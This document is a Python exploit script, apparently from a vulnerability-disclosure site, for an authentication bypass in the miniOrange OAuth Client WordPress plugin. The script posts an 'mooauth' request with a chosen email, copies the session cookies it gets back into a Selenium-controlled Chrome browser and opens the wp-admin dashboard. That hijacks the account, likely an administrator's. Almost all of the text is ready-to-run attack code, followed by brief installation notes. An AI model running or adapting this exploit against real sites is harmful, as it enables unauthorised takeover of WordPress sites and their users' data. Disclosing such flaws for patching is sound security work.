miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py

#!/usr/bin/python3

import sys
import getopt
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import chromedriver_binary


def main(argv):
    client_url = 'https://lana.solutions/vdb/miniorange-oauth-client/'
    email = 'vdb@lana.codes'
    try:
        opts, args = getopt.getopt(argv, 'hc:e:', ['client_url=', 'email='])
    except getopt.GetoptError:
        print('miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py -c <client_url> -e <email>')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print('miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py -c <client_url> -e <email>')
            sys.exit()
        elif opt in ('-c', '--client_url'):
            client_url = arg
        elif opt in ('-e', '--email'):
            email = arg

    # format urls
    client_url = client_url.rstrip('\/') + '/'

    # chrome options
    chrome_options = Options()
    chrome_options.add_experimental_option('detach', True)

    # chrome driver
    chrome_driver = webdriver.Chrome(options=chrome_options)

    # open wordpress
    chrome_driver.get(client_url)

    # post mooauth
    response = requests.post(client_url, headers={'Content-Type': 'application/x-www-form-urlencoded'},
                             data={'option': 'mooauth', 'email': email}, allow_redirects=False)

    # set cookie from post request
    for cookie in response.cookies:  # session cookies
        cookie_dict = {'name': cookie.name, 'value': cookie.value}
        chrome_driver.add_cookie(cookie_dict)

    # open wordpress admin
    chrome_driver.get(client_url + 'wp-admin')


if __name__ == '__main__':
    main(sys.argv[1:])

Packages:
https://pypi.org/project/selenium/
https://pypi.org/project/chromedriver-binary-auto/

Experience with Python packages is required to install the Selenium and ChromeDriver. If you need help, contact us at info@lana.codes